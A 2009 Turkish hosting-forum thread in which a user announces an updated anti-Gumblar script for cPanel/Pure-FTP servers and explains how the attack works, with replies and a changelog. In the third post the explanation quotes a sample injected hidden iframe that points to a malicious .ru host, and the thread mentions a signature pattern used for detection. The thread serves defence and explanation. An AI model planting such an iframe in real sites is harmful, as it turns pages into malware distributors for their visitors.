astropaykartsatis.net
User Tag List

Yeni Konu Aç Cevap Yaz
14.08.2009, 05:07 1 (permalink)
hidonet
  • Üyelik Tarihi19.05.2008
  • Ticaret Sayısı0
  • Mesajlar37
Anti-Gumblar scripti guncellendi #permalink (permalink)
Cpanel/Pure-FTP/Clamav kullanan Linux sunucular yazdigimiz iframe/javascript/gumblar saldirisi engelleyici script guncellendi. Artik daha yetenekli bir yazılım haline geldi. Pure FTP nin upload sonrasi bu scripti calistirmasi nedeniyle malesef ilk dosyayi kaybediyoruz. Ancak bu bulasmadan sonra;

1 ) Viruslu dosya sizin belirlediginiz karantina dizinine atilir
2 ) Eger clamav bu dosyada virus bulamazsa, gumblar saldirilarinin karakteristik kelimelerinden olusturulan patern ile text ( html, php, asp gibi ) dosyalarda tarama yapilir. ( .cn:808x/tx.cgi... vb.) kelimeler aranir.
3 ) Hesabin sifresi degistirilir
4 ) Viruslu dosyayi upload edenin IP adresi ( CSF, APF gibi firewall uygulamalariyla ) bloklanir.
5 ) Saldiran kisinin o an bosta olan veya faal baglantisi kesilir
6 ) Butun bu islemlerle ilgili bir alarm/bildiri maili belirlediginiz adrese gonderilir

http://www.oxio.net/anti_gumblar/

http://www.oxio.net/anti_gumblar/anti_gumblar.tar.gz

Latest Release - 20090813
Hızlı PM Gönder
Gönder
Alıntı ile Cevapla
14.08.2009, 07:04 2 (permalink)
iyinet
iyinet Paylaşım için teşekkürler
  • Neredenİzmir Şubesi
  • Üyelik Tarihi2.09.2002
  • Ticaret Sayısı0
  • Mesajlar5,572
Elinize sağlık da benim gibi bilmeyenler için gumblar ın ne olduğunu açıklayabilirmisiniz.
Konu açmadan önce " FORUM KURALLARI " bölümünü gözden geçirin.

Her türlü soru, öneri, memnuniyet, şikayet ve bilgi taleplerinizi iletmek için " MAİL " adresimizi kullanabilir veya " İLETİŞİM FORMU " üzerinden bizlere ulaşabilirsiniz.

Kurallara Uyduğunuz için Teşekkürler !
Hızlı PM Gönder
Gönder
Alıntı ile Cevapla
14.08.2009, 12:56 3 (permalink)
hidonet
  • Üyelik Tarihi19.05.2008
  • Ticaret Sayısı0
  • Mesajlar37
sitelerinizin google tarafindan sakincali site olarak gosterilmesine neden olan seyler.

Ilk olarak gumblar.cn adli site ile yayildigi icin bu adi aldi.

FTP sifrelerinizin makinaniza bulasan bi trojan tarafindan calinarak botnet sahibine gonderilmesi ve bu sitelerin dosyalarina

PHP- Kodu:
<iframe src="http://x9e.ru:8080/index.php" width=126 height=156 style="visibility: hidden"></iframe
seklinde kodlarin eklenmesi esasina dayanir. Bu sayede siteniz artik virus dagitan bir site haline gelir ve google tarafindan zararli yazilim dagitan site olarak isaretlenir. Firefox, Chrome ve Opera ile giren butun ziyaretciler ekranda kocaman kirmizi bi yazi gorur.

Sizin karizma da kirmizi kalemle cizilir...

Aslinda hosting firmasi bu isten birinci seviyede sorumlu degildir. Cunku FTP sifresini caldiran musteridir. Ancak hosting firmasi buna tedbir alirsa daha $ukela olur...
Hızlı PM Gönder
Gönder
Alıntı ile Cevapla
14.08.2009, 17:17 4 (permalink)
iyinet
iyinet Paylaşım için teşekkürler
  • Neredenİzmir Şubesi
  • Üyelik Tarihi2.09.2002
  • Ticaret Sayısı0
  • Mesajlar5,572
Anladım, açıklama için teşekkürler.
Peki Kaspersky gibi internet güvenlik araçları bunu henüz tesbit edemiyorlar mı?
Konu açmadan önce " FORUM KURALLARI " bölümünü gözden geçirin.

Her türlü soru, öneri, memnuniyet, şikayet ve bilgi taleplerinizi iletmek için " MAİL " adresimizi kullanabilir veya " İLETİŞİM FORMU " üzerinden bizlere ulaşabilirsiniz.

Kurallara Uyduğunuz için Teşekkürler !
Hızlı PM Gönder
Gönder
Alıntı ile Cevapla
15.08.2009, 14:16 5 (permalink)
osahin
  • Üyelik Tarihi8.10.2006
  • Yaş37
  • Ticaret Sayısı0
  • Mesajlar3,078
Ediyorlar ama bu sizinle ilgili bir güvenlik aşaması oluyor, örneğin benim 50 müşterim var kimi zaman kendi sitelerinde ufak değişiklikleri kendileri yapmak istiyor ve onların bilgisayarlarındaki trojanlar müşterilerin ftp' ye bağlanmasından sonra sunucuya geçiyor sonrada müşteri arayıp niye benim sitem böyle oldu diyor :p bu sunucu tabanlı bir koruma bence çok güzel tebrikler
Hızlı PM Gönder
Gönder
Alıntı ile Cevapla
2.09.2009, 06:37 6 (permalink)
hidonet
  • Üyelik Tarihi19.05.2008
  • Ticaret Sayısı0
  • Mesajlar37
Anti Gumblar Scripti Güncellendi #permalink (permalink)
Release Changelog - 20090902
- ) ftp_clamscan.sh dosyasi artik kaldirildi
- ) Kullanici adi bulma fonksiyonundaki hatalar giderildi
- ) FTP baglantisi kesme ozelligi yenilendi
- ) Ayar ( config ) bolumu ayri dosyaya alindi. ( ftp_clamscan_config.php )
- ) Log dosyasi /var/log/ftp_clamscan.log olarak ( veya siz ne isterseniz o sekilde ) calisabiliyor
- ) Karantina klasoru /quarantine/clamav/ oldu ( veya siz nerede isterseniz orada da olur )
- ) Bazi kucuk fixler yapildi

Detay icin : http://www.oxio.net/anti_gumblar/
Hızlı PM Gönder
Gönder
Alıntı ile Cevapla
11.09.2009, 21:07 7 (permalink)
ognn
  • Üyelik Tarihi11.09.2009
  • Yaş26
  • Ticaret Sayısı0
  • Mesajlar8
bende bilmiyordum gumblar olayını eyw
Hızlı PM Gönder
Gönder
Alıntı ile Cevapla
Yeni Konu Aç Cevap Yaz
Şu an bu konuyu okuyan kişi sayısı: 1 (0 üye ve 1 misafir)
 
Seçenekler
Yetkileriniz
Konu Acma Yetkiniz Yok Cevap Yazma Yetkiniz Yok Eklenti Yükleme Yetkiniz Yok Mesajınızı Değiştirme Yetkiniz Yok
BB code is Açık Smileler Açık [IMG] Kodları Açık HTML-Kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık
Forum Kuralları
Benzer Konular
Konu Konuyu Başlatan Forum Cevap Son Mesaj
Anket Listesi Guncellendi‏! daniel1336 Internetten Para 0 30.06.2011 16:42
Gumblar saldirilari icin engelleyici yazdim... hidonet Güvenlik 2 25.03.2010 22:07
köy scripti dernek scripti vakıf scripti semt scripti belediye scripti ilçe scripti seref23 Site Takas 1 31.05.2008 00:37
Datateknoloji | Great Lakes | Stoklar Guncellendi | Kaçırmayın !!! DataTeknoloji Dedicated - Co Location 0 12.05.2007 01:56
Pr Guncellendi! heteren Link Değişim 45 17.07.2005 01:51

Forum Saati: 03:25. Zaman dilimi GMT +3 olarak ayarlanmıştır.
Powered by vBulletin™ Version 3.8.7
Copyright © 2017 vBulletin Solutions, Inc. All rights reserved.